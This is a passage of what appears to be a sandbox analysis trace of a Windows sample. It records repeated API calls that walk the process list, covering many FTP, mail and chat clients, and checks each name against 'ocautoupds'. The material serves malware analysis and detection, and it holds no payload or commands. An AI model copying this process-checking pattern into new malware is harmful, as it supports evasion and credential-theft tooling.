lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.442] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356c488 [0094.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x356c488, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bitkinex.exe", lpUsedDefaultChar=0x0) returned 13 [0094.442] lstrcpyA (in: lpString1=0x567fabc, lpString2="bitkinex.exe" | out: lpString1="bitkinex.exe") returned="bitkinex.exe" [0094.442] StrStrIA (lpFirst="bitkinex.exe", lpSrch="ocautoupds") returned 0x0 [0094.442] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0094.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.443] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356c4a0 [0094.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x356c4a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="coreftp.exe", lpUsedDefaultChar=0x0) returned 12 [0094.444] lstrcpyA (in: lpString1=0x567fabc, lpString2="coreftp.exe" | out: lpString1="coreftp.exe") returned="coreftp.exe" [0094.444] StrStrIA (lpFirst="coreftp.exe", lpSrch="ocautoupds") returned 0x0 [0094.444] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0094.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0094.445] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3547948 [0094.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x3547948, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="far.exe", lpUsedDefaultChar=0x0) returned 8 [0094.445] lstrcpyA (in: lpString1=0x567fabc, lpString2="far.exe" | out: lpString1="far.exe") returned="far.exe" [0094.445] StrStrIA (lpFirst="far.exe", lpSrch="ocautoupds") returned 0x0 [0094.445] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0094.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0094.446] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356c590 [0094.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x356c590, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="filezilla.exe", lpUsedDefaultChar=0x0) returned 14 [0094.446] lstrcpyA (in: lpString1=0x567fabc, lpString2="filezilla.exe" | out: lpString1="filezilla.exe") returned="filezilla.exe" [0094.446] StrStrIA (lpFirst="filezilla.exe", lpSrch="ocautoupds") returned 0x0 [0094.446] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0094.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.448] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356c6b0 [0094.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x356c6b0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="flashfxp.exe", lpUsedDefaultChar=0x0) returned 13 [0094.448] lstrcpyA (in: lpString1=0x567fabc, lpString2="flashfxp.exe" | out: lpString1="flashfxp.exe") returned="flashfxp.exe" [0094.448] StrStrIA (lpFirst="flashfxp.exe", lpSrch="ocautoupds") returned 0x0 [0094.448] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0094.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0094.449] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356c6c8 [0094.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x356c6c8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fling.exe", lpUsedDefaultChar=0x0) returned 10 [0094.449] lstrcpyA (in: lpString1=0x567fabc, lpString2="fling.exe" | out: lpString1="fling.exe") returned="fling.exe" [0094.449] StrStrIA (lpFirst="fling.exe", lpSrch="ocautoupds") returned 0x0 [0094.449] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0094.451] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0094.451] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x356d2a8 [0094.451] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x356d2a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="foxmailincmail.exe", lpUsedDefaultChar=0x0) returned 19 [0094.451] lstrcpyA (in: lpString1=0x567fabc, lpString2="foxmailincmail.exe" | out: lpString1="foxmailincmail.exe") returned="foxmailincmail.exe" [0094.451] StrStrIA (lpFirst="foxmailincmail.exe", lpSrch="ocautoupds") returned 0x0 [0094.451] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0094.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0094.452] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x356d208 [0094.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x356d208, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gmailnotifierpro.exe", lpUsedDefaultChar=0x0) returned 21 [0094.452] lstrcpyA (in: lpString1=0x567fabc, lpString2="gmailnotifierpro.exe" | out: lpString1="gmailnotifierpro.exe") returned="gmailnotifierpro.exe" [0094.452] StrStrIA (lpFirst="gmailnotifierpro.exe", lpSrch="ocautoupds") returned 0x0 [0094.452] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0094.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0094.453] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3547a28 [0094.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x3547a28, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icq.exe", lpUsedDefaultChar=0x0) returned 8 [0094.453] lstrcpyA (in: lpString1=0x567fabc, lpString2="icq.exe" | out: lpString1="icq.exe") returned="icq.exe" [0094.453] StrStrIA (lpFirst="icq.exe", lpSrch="ocautoupds") returned 0x0 [0094.453] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0094.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.455] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356c4b8 [0094.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x356c4b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="leechftp.exe", lpUsedDefaultChar=0x0) returned 13 [0094.455] lstrcpyA (in: lpString1=0x567fabc, lpString2="leechftp.exe" | out: lpString1="leechftp.exe") returned="leechftp.exe" [0094.455] StrStrIA (lpFirst="leechftp.exe", lpSrch="ocautoupds") returned 0x0 [0094.455] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0094.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0094.456] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356c4d0 [0094.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x356c4d0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncftp.exe", lpUsedDefaultChar=0x0) returned 10 [0094.456] lstrcpyA (in: lpString1=0x567fabc, lpString2="ncftp.exe" | out: lpString1="ncftp.exe") returned="ncftp.exe" [0094.456] StrStrIA (lpFirst="ncftp.exe", lpSrch="ocautoupds") returned 0x0 [0094.456] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0094.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.458] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3571a68 [0094.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x3571a68, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="notepad.exe", lpUsedDefaultChar=0x0) returned 12 [0094.458] lstrcpyA (in: lpString1=0x567fabc, lpString2="notepad.exe" | out: lpString1="notepad.exe") returned="notepad.exe" [0094.458] StrStrIA (lpFirst="notepad.exe", lpSrch="ocautoupds") returned 0x0 [0094.458] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0094.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0094.459] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3571ac8 [0094.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x3571ac8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="operamail.exe", lpUsedDefaultChar=0x0) returned 14 [0094.459] lstrcpyA (in: lpString1=0x567fabc, lpString2="operamail.exe" | out: lpString1="operamail.exe") returned="operamail.exe" [0094.459] StrStrIA (lpFirst="operamail.exe", lpSrch="ocautoupds") returned 0x0 [0094.459] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0094.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="outlook.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.461] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3571af8 [0094.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="outlook.exe", cchWideChar=-1, lpMultiByteStr=0x3571af8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outlook.exe", lpUsedDefaultChar=0x0) returned 12 [0094.461] lstrcpyA (in: lpString1=0x567fabc, lpString2="outlook.exe" | out: lpString1="outlook.exe") returned="outlook.exe" [0094.461] StrStrIA (lpFirst="outlook.exe", lpSrch="ocautoupds") returned 0x0 [0094.461] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0094.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0094.462] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3571a80 [0094.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x3571a80, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pidgin.exe", lpUsedDefaultChar=0x0) returned 11 [0094.462] lstrcpyA (in: lpString1=0x567fabc, lpString2="pidgin.exe" | out: lpString1="pidgin.exe") returned="pidgin.exe" [0094.462] StrStrIA (lpFirst="pidgin.exe", lpSrch="ocautoupds") returned 0x0 [0094.462] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0094.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0094.463] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3571c00 [0094.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x3571c00, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="scriptftp.exe", lpUsedDefaultChar=0x0) returned 14 [0094.463] lstrcpyA (in: lpString1=0x567fabc, lpString2="scriptftp.exe" | out: lpString1="scriptftp.exe") returned="scriptftp.exe" [0094.463] StrStrIA (lpFirst="scriptftp.exe", lpSrch="ocautoupds") returned 0x0 [0094.463] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0094.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0094.465] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3571a98 [0094.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x3571a98, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="skype.exe", lpUsedDefaultChar=0x0) returned 10 [0094.465] lstrcpyA (in: lpString1=0x567fabc, lpString2="skype.exe" | out: lpString1="skype.exe") returned="skype.exe" [0094.465] StrStrIA (lpFirst="skype.exe", lpSrch="ocautoupds") returned 0x0 [0094.465] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0094.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.466] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3571bb8 [0094.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x3571bb8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smartftp.exe", lpUsedDefaultChar=0x0) returned 13 [0094.466] lstrcpyA (in: lpString1=0x567fabc, lpString2="smartftp.exe" | out: lpString1="smartftp.exe") returned="smartftp.exe" [0094.466] StrStrIA (lpFirst="smartftp.exe", lpSrch="ocautoupds") returned 0x0 [0094.466] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0094.467] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0094.467] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3571ab0 [0094.467] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x3571ab0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thunderbird.exe", lpUsedDefaultChar=0x0) returned 16 [0094.467] lstrcpyA (in: lpString1=0x567fabc, lpString2="thunderbird.exe" | out: lpString1="thunderbird.exe") returned="thunderbird.exe" [0094.467] StrStrIA (lpFirst="thunderbird.exe", lpSrch="ocautoupds") returned 0x0 [0094.467] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0094.469] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.469] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3571c48 [0094.469] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x3571c48, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="totalcmd.exe", lpUsedDefaultChar=0x0) returned 13 [0094.469] lstrcpyA (in: lpString1=0x567fabc, lpString2="totalcmd.exe" | out: lpString1="totalcmd.exe") returned="totalcmd.exe" [0094.469] StrStrIA (lpFirst="totalcmd.exe", lpSrch="ocautoupds") returned 0x0 [0094.469] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0094.470] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.470] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3571b10 [0094.470] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x3571b10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="trillian.exe", lpUsedDefaultChar=0x0) returned 13 [0094.470] lstrcpyA (in: lpString1=0x567fabc, lpString2="trillian.exe" | out: lpString1="trillian.exe") returned="trillian.exe" [0094.470] StrStrIA (lpFirst="trillian.exe", lpSrch="ocautoupds") returned 0x0 [0094.470] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0094.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.473] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3571b40 [0094.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x3571b40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="webdrive.exe", lpUsedDefaultChar=0x0) returned 13 [0094.473] lstrcpyA (in: lpString1=0x567fabc, lpString2="webdrive.exe" | out: lpString1="webdrive.exe") returned="webdrive.exe" [0094.473] StrStrIA (lpFirst="webdrive.exe", lpSrch="ocautoupds") returned 0x0 [0094.473] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0094.475] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.475] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3571bd0 [0094.475] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x3571bd0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="whatsapp.exe", lpUsedDefaultChar=0x0) returned 13 [0094.475] lstrcpyA (in: lpString1=0x567fabc, lpString2="whatsapp.exe" | out: lpString1="whatsapp.exe") returned="whatsapp.exe" [0094.475] StrStrIA (lpFirst="whatsapp.exe", lpSrch="ocautoupds") returned 0x0 [0094.475] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0094.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 